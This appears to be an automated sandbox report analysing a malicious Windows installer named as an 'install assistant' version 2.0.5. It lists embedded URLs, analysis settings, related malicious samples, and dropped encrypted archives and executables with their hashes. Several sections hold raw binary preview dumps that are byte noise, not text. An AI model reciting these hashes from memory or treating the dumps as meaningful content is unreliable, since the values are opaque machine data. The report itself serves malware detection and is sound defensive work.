https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F0AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.2135961288.0000000000861000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000000.2156757019.0000000000D1D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | false | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | false | high
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | false | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F0AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.2135961288.0000000000861000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000000.2156757019.0000000000D1D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | false | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | false | high
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579694
Start date and time:2024-12-23 07:41:23 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:108
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Critical Process Termination
Sample name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
renamed because original name is a hash value
Original Sample Name:_2.0.5.exe
Detection:MAL
Classification:mal88.evad.winEXE@126/32@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 76%
  • Number of executed functions: 28
  • Number of non-executed functions: 74
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, backgroundTaskHost.exe
  • Excluded IPs from analysis (whitelisted): 40.126.53.7, 20.103.156.88, 13.107.246.63, 2.16.158.50, 4.175.87.197
  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com
  • Not all processes were analyzed; the report is missing behavior information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:42:17 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp modified
01:42:20 | API Interceptor | 29x Sleep call for process: powershell.exe modified
No context
Match: C:\Program Files (x86)\Windows NT\7zr.exe (associated samples, with Detection and Threat Name)
  • #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Threat Name: Unknown
  • Zt43pLXYiu.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Threat Name: Unknown
  • Zt43pLXYiu.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Threat Name: Unknown
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Threat Name: Unknown
Match: C:\Program Files (x86)\Windows NT\hrsw.vbc (associated samples, with Detection and Threat Name)
  • #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Threat Name: Unknown
  • Zt43pLXYiu.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Threat Name: Unknown
  • Zt43pLXYiu.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Threat Name: Unknown
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Threat Name: Unknown
Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):831200
Entropy (8bit):6.671005303304742
Encrypted:false
SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5:84DC4B92D860E8AEA55D12B1E87EA108
SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
  • Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
  • Filename: Zt43pLXYiu.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
  • Filename: Zt43pLXYiu.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
  • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
File Type:data
Category:dropped
Size (bytes):249984
Entropy (8bit):7.999231321310217
Encrypted:true
SSDEEP:6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
MD5:11518A96514343C3195F339C0F0C514F
SHA1:FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
SHA-256:98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
SHA-512:978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3598848
Entropy (8bit):7.004949099807939
Encrypted:false
SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5:1D1464C73252978A58AC925ECE57F0FB
SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 11%
Joe Sandbox View:
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
  • Filename: Zt43pLXYiu.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
  • Filename: Zt43pLXYiu.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):249984
                                                          Entropy (8bit):7.999231321310217
                                                          Encrypted:true
                                                          SSDEEP:6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
                                                          MD5:11518A96514343C3195F339C0F0C514F
                                                          SHA1:FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
                                                          SHA-256:98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
                                                          SHA-512:978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
                                                          Malicious:false
                                                          Preview:.@S.....i?S.,..............u.#....^..I.&..4.E.z..hg9`.[1...R....F.O...n.'............L.J.5..31.....iI*.F..S./......&w.)..:...V...uW....4........_.......B.$..F<...........D3....#.>..Yh{rO!.9>k..>..U.i...(..i.../Q...U..q.W6.._t..+(.......Z....b...OK.....p.....^...~7.....C.>.......Q....K.^.......p.|.]O....07.yy.1X.Pr.4...wm.E..2....$..5..g...2=,........7,.^`S.RM..84.Bb.&PgJV..x.9....9Z.3.)..y.O`J....O...C.?...@..d.DJ....1K..F3b.=b......W......m.e...!a..*.i...%.bA....DI..~.....q........{HQ.".......Xn.G#~0.h&...RN".~./.t....n0...7.w.2.#N.W$.<...B... z.....!Y.x$...R..A{.z.U..q.S&..G.&...`...J*.*.'.Y..9..`...:.E...d...cE...P..T.H.........=.e.X..[mR*@OT7./.v...Z.OG.p6.E^.!.e....g.........i(xc...Gb.u=......t.KV...c........|......w.x...+..6..PP..I....~.iP.....K..g>..(*..cq..........J..S..]O..[...w.K....EG..o..=.(\.....8z....5..?.R$...).xR"\A..O#v.:...RK.\...U...~<...a.h..2.h....v.wq.....*...$.&a..w."..a.j...e...hH...u.a.?tU....0.^{..cb.....
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5649408
                                                          Entropy (8bit):6.392614480390128
                                                          Encrypted:false
                                                          SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                          MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                          SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                          SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                          SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.997020385738187
                                                          Encrypted:true
                                                          SSDEEP:1536:HH0XLz6hYcW9MqEMv94PUICwNW6apEIeq0/cR:HHvvW9NE54efcR
                                                          MD5:5AE192345F0F69A9B67788EB3F38FB9B
                                                          SHA1:C9ACF1FAC77D08FB8DF1443D067D171B089EF959
                                                          SHA-256:64FE275448F9A1FB87250C7D4AD637274C259F2958E3BB58D68E722DD91E9CC7
                                                          SHA-512:A5B9AA3870DCA279A055B2CDBDD903E3A0525D23E8CD01181686ECFBFE67F6A576B924CD582256C74F0BB22100A0D02F8270B9679728C65E023E0E342AA89998
                                                          Malicious:false
                                                          Preview:.@S...._..l ..............).....TcxC..xe.Q.....?E6jnzk.g;..aW;'...!+..y.....Jc..r.U..z.f.hI4A...3t.C...<..g,...~.O.f......%x.R..s.HMG.{.......3.Vpk%.......W.........,....V..q...Ro.8,U.q...........?c.q....+.(S._...v.)~...8.P..t.R..!..9.B.....f..F.}.....s_L..w..G...;...K..z..O.`.d.Z..9...s7u.3...fe.w..Y....{...?.@.:v..F2 -.....a..s......5dV...n.${..k.F%].v.'.....9.|.y..#N..c....0...f.e6.SY......x.e......#K.0...&..i.(.J...T..t..V..gk....+^FN@J0R.Z..bB.>...xk....xh..i.!1<..A>p...y...(........[..u~q..L.OH.-Y.....".....k/1`...7..@.o.C.P.(g@...m:-..|.B...{~.-('.......;.kZ..c..y..w3u4.;...../-G.V.g....y.-hV~P......@.,...C...N.{{p..X.......*H...Tu..&...qTo..>....}P....>.:F|.....5.......$..>c...].._......b...+y..Pc..G.(...o.|.....V]/..\....^)..ERB2.X.........K\(........~^.m..v...).'..M.:...3<..e..&Uj.........,..-9.}.....VI..:..<....6R.{Tl.X....j&C....vI,*...x;....CX.......b.6[..CB....J...k.j.p. e..c.8(...v....d..,.E.!j.V...#.H..3..W.$
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.9970203857381925
                                                          Encrypted:true
                                                          SSDEEP:1536:drlLRqRByqzVF8GNxmsf+KlTzr3Dq9MgvNeIRlQj:dr+BtVF8GnmsxcMg1eIRSj
                                                          MD5:749867F354FA0A2E41EBC1FD6F8DC516
                                                          SHA1:C8D2532139FE2A265D4ED10E30A807176F8F3BAA
                                                          SHA-256:B80ADB9791998685A921FFFEFBE66B059F56C0CF0055DBBCCB4515B60F6337C1
                                                          SHA-512:14D24D465B4608DE0FE31D86C45D20F4A97C492D13F12FA62EF7290AC1CB2FE9A65FA09702497E76FBDF8D9894487B7D9E182E514B7EE3785F824DC944709492
                                                          Malicious:false
                                                          Preview:7z..'.....:u........2........4.!.-.....N...H..M 18.....&..G.....VHJ..@..1.x.9....P.U....<...}.V.k.^....Q..VX4.!D.=..3F...;.P....n.....L..j.&.?.0^....E...i\A.5F...CzO..D..]&B..Z .L}...Z..m.P...OI.5J"{./...5v.u...:.1.....mA..V.?...PW.z*...b.4.d.g..`.+`?PE....o...\...M...Z;.N....0....1t.&(I....B...j.........9...T.O.u...m<....[..7..v4..W..#L^c..P.).+.G......f.)x.S...8.l. -.]...\k.4.<.n....Q0.D.I.:.(#PU.CLe...B.P...M~.N.4e...%.......Hp...(.o.......3.iF..".w.b..A-6...R......R...pc5L.....fgN.=_7U/.E..z.M....3R.5qq.)....p.?....X(.l..o.s.t.I..6U.T....K...d.......!..i.O.....U...z.w....m..7+....).&..S.M.......[Z.j....e.k.k.7.n...a..LR.>..-.85....x.y}.....v...g...r..C.....N.U3{(..'..\l.....{...5$.|..=^...l...R...(.f...=.;...m.=>.w....5.]..q.. *O.....`.{.|..TR#\z......(ETpTV..}.q..y`....53.P..,H'.../W..0..[..h..]...-...y..8InU.}..6......%T.sI..)...9.UYyZ...4{1n......5=..._7`4....h+..g.V...M...YR..&8...}...#(....g.-..?a7q9.%pu.'._...N...C.t...XNZ.L.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.996966859255975
                                                          Encrypted:true
                                                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                          Malicious:false
                                                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.996966859255979
                                                          Encrypted:true
                                                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                          MD5:4CB8B7E557C80FC7B014133AB834A042
                                                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                          Malicious:false
                                                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):31890
                                                          Entropy (8bit):7.99402458740637
                                                          Encrypted:true
                                                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                          MD5:8622FC7228777F64A47BD6C61478ADD9
                                                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                          Malicious:false
                                                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):31890
                                                          Entropy (8bit):7.99402458740637
                                                          Encrypted:true
                                                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                          Malicious:false
                                                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):74960
                                                          Entropy (8bit):7.99759370165655
                                                          Encrypted:true
                                                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                          MD5:950338D50B95A25F494EE74E97B7B7A9
                                                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                          Malicious:false
                                                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):74960
                                                          Entropy (8bit):7.997593701656546
                                                          Encrypted:true
                                                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                                                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                          Malicious:false
